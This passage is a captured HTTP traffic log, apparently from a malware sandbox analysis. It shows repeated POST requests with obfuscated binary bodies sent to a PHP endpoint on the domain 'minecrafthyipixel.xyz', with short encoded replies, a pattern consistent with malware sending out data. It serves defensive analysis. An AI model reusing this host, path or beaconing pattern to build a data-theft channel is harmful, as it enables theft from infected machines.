                                                                                                                                    Apr 19, 2024 13:44:03.793222904 CEST2512OUTData Raw: 57 54 5e 59 59 4b 51 5a 5c 5e 59 59 57 5f 58 5b 54 56 5f 5d 54 5b 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^YYKQZ\^YYW_X[TV_]T[SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2>5! Y$?$;%T*++Y1W%+R411=?_ 3:$[. X
                                                                                                                                    Apr 19, 2024 13:44:04.044292927 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:03 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YKVOfCrpboNGa4NkSkf4jJp9xl%2BRiE9oABkEk2yAeWQD%2BIEjxllfHqXfhtyLG5fkdOM2CUMRIe46y4RSuBrO%2BRZ0AutJtB9RGt%2BB4O5SBE5cTSz40WNFEJ0Rs%2FFgtK1fSN%2F%2BwdUha20%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3f76a92b0a5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:04.044357061 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    140192.168.2.449893104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:04.283432961 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:04.388004065 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:04.388139009 CEST2512OUTData Raw: 57 59 5e 55 5c 43 54 5f 5c 5e 59 59 57 5f 58 53 54 57 5f 5e 54 5b 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^U\CT_\^YYW_XSTW_^T[S\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>R"+7$+%+.>;&?&+>P#15)4"<Z/5$[. X
                                                                                                                                    Apr 19, 2024 13:44:04.770385981 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:04 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cKLqXJw%2Bnr83xNoJn17NmLq2EOixrjs4%2FYix%2BoXhSTgpn5Y7z6rJtTe%2BGkMPghW6jSLLb%2Frl0iWVWRVKd5k16h20Bac0aHeiPr8f2svR41fGXezq9kBHbUqmpJEnUD3%2B8zOKJVCh1Cg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3fb1e8253f1-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:04.770447016 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    141192.168.2.449894104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:04.996984959 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:05.103666067 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:05.103812933 CEST2512OUTData Raw: 57 5a 5e 5d 59 45 54 58 5c 5e 59 59 57 5f 58 5e 54 57 5f 5f 54 5e 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^]YETX\^YYW_X^TW__T^SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%-> +(]$+['6=('9 R&P4++48^95$[. X
                                                                                                                                    Apr 19, 2024 13:44:05.361855030 CEST629INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:05 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wTkTJdQGfPSYiwcD3YcIuHDn1%2F%2FALSWDBi3hIYsxbgLg6cbPBiE0G%2BSL%2Bew0Dhxlxh14ze%2FLVsnXxcs8bN2S8hJvHW%2BOIs%2BBha%2FMKzON7NaR77JKBe8bEVbPp80fiiHLpiXpTzCAW8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3ff9a4553cc-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:05.361917973 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    142192.168.2.449895104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:05.590873003 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:05.695827961 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:05.695970058 CEST2512OUTData Raw: 57 5f 5b 5b 59 47 51 58 5c 5e 59 59 57 51 58 5b 54 5b 5f 5b 54 5d 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[[YGQX\^YYWQX[T[_[T]S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&>%6<003')>3\%)&% "1)+<#<#:%$[. X =
                                                                                                                                    Apr 19, 2024 13:44:05.976459026 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:05 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5aec18Ix6HkzdGdKh6XVN%2BAB4MKEj6EkgrdzKXxfZndWccrDToRjO5RLZqn2DEES8VfWGZ6IEMuiYhZUlSjdyVvpiqZ0XIgZrJcfHst7Mv0xi7WIV%2F1npjJLKqnTlYlkRXf6GDZb7l8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4034b28b0d6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:05.976521015 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    143192.168.2.449897104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:06.302380085 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2180
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:06.407438040 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:06.407572031 CEST2180OUTData Raw: 57 5c 5b 59 59 45 54 59 5c 5e 59 59 57 57 58 5e 54 56 5f 5d 54 5d 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[YYETY\^YYWWX^TV_]T]SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&!58(' 31T*+&2% 2=]'^4<3/%$[. X 1
                                                                                                                                    Apr 19, 2024 13:44:06.683408976 CEST768INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:06 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bd5p%2F7ki7a3ls82Zm6jVP5s4hWV97mOk6uXfkhB4ECcgBCa8uiLpQIvKI1Eholh6EcLIpbE5wUXxh3UxrksEXHN4HzkZsCgIpqZXK4bXS97rPtRfXN%2Bf9uEkPQiP9fSPwi6OdQE2NQY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca407bbf9ad5c-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 27 01 24 35 3e 58 36 39 23 5d 29 20 26 59 29 37 29 5f 3d 07 21 5a 23 2e 37 0b 38 2a 2b 05 3c 5d 3a 17 26 55 35 56 33 2d 34 56 26 0a 21 59 00 1a 3a 01 34 3f 29 5c 2d 3a 25 1c 28 08 3d 5b 20 22 38 04 28 2e 31 18 20 06 27 5b 3c 2e 35 56 2f 01 3c 53 3f 5e 29 5a 3b 37 08 15 21 11 2c 52 09 12 25 51 28 5e 34 5e 32 20 22 0d 23 0f 3f 03 3f 11 22 59 33 3b 3c 51 24 33 06 16 39 22 3e 54 26 3e 29 1e 29 04 3c 1f 20 12 22 08 32 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98'$5>X69#]) &Y)7)_=!Z#.78*+<]:&U5V3-4V&!Y:4?)\-:%(=[ "8(.1 '[<.5V/<S?^)Z;7!,R%Q(^4^2 "#??"Y3;<Q$39">T&>))< "2.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:44:06.683470011 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    144192.168.2.449898104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:06.530709982 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:06.635093927 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:06.635377884 CEST2512OUTData Raw: 57 54 5e 55 59 40 54 5b 5c 5e 59 59 57 55 58 5a 54 51 5f 59 54 58 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^UY@T[\^YYWUXZTQ_YTXS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^2*!' 0$(1P*+?^&V2.#26)]7#<^.$[. X -
                                                                                                                                    Apr 19, 2024 13:44:06.908200979 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:06 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1fgr2fNrJ4Qnx86a1TQO%2Fc58wRQGk4%2Bi2qovOTBwEtKXaQzevVt4XhnpKIZjhKyyaCxbL9mnok2S%2FlqVoH9hLu0LyeKZdtFQgleEJLUQoBTnVwaS8FygiyS5%2BjeHmHWGPdqTnwwlQs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4092dddb074-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:06.908283949 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    145192.168.2.449899104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:07.142115116 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:07.247148991 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:07.247411966 CEST2512OUTData Raw: 52 5d 5b 5f 59 4b 54 5d 5c 5e 59 59 57 51 58 59 54 50 5f 58 54 59 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R][_YKT]\^YYWQXYTP_XTYS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_2--"/0000+%W=?X':$1("#2Q*7<,\-%$[. X =
                                                                                                                                    Apr 19, 2024 13:44:07.522196054 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:07 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2BAmg7idYH3ox2dny77ZX6xOgU7irkl8bb4kkTf%2BBd3j8HTX%2Fdkmdd4ZZ9vtBSAv%2BQtNtSQEXXcmKDmdtPbYlPAyWT2ce6R3XubeIO%2FLSqRhXMxJt3KLoISIysBSjAr5JIWzmM6QRGA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca40cfded6765-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:07.522259951 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    146192.168.2.449900104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:07.747348070 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:07.851892948 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:07.852009058 CEST2512OUTData Raw: 57 58 5e 5c 5c 41 54 5f 5c 5e 59 59 57 53 58 53 54 51 5f 5a 54 58 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX^\\AT_\^YYWSXSTQ_ZTXS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%2&W!'0$35Q=?]%:/%]*R#2+8<#<,:$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:08.131608009 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:08 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=akhmSsCL3HOE7EhJrT8eDmLfZWJkVH2Z582qmZz9MVzsD%2BXSdVfhxuiY8nsa%2B1yKfzXCKDMPkEPnYkJ45LswouhZTYy7%2BaqdcLV5Sq%2BiK65C29yLC%2FUCFc5w2H0%2Bc8IPpSDymZuSnHk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca410c8b37bd5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:08.131669998 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    147192.168.2.449901104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:08.356673002 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:08.461838007 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:08.462030888 CEST2504OUTData Raw: 52 5e 5b 5c 59 47 54 5d 5c 5e 59 59 57 57 58 5a 54 5a 5f 58 54 58 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[\YGT]\^YYWWXZTZ_XTXS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'."U5+4Z3#80V*+#]198S&27%>+ Z/.$[. X !
                                                                                                                                    Apr 19, 2024 13:44:08.738712072 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:08 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ATEUSY7%2FfxzqWFwdDiE0E2G53DWAwKM5meRh7RRh8Q0Iq3WESuSR9QMQSiEhi%2BFyzyhuCSZk0LcqZh%2FF11mUwEEeGWXMDuzos1H5gBdGGRgiHDZwrdjwYhBCTuQviimVqW4%2FHRmrN%2Fw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4149f0c06e6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:08.738780022 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    148192.168.2.449902104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:08.979562998 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:09.084722996 CEST25INHTTP/1.1 100 Continue
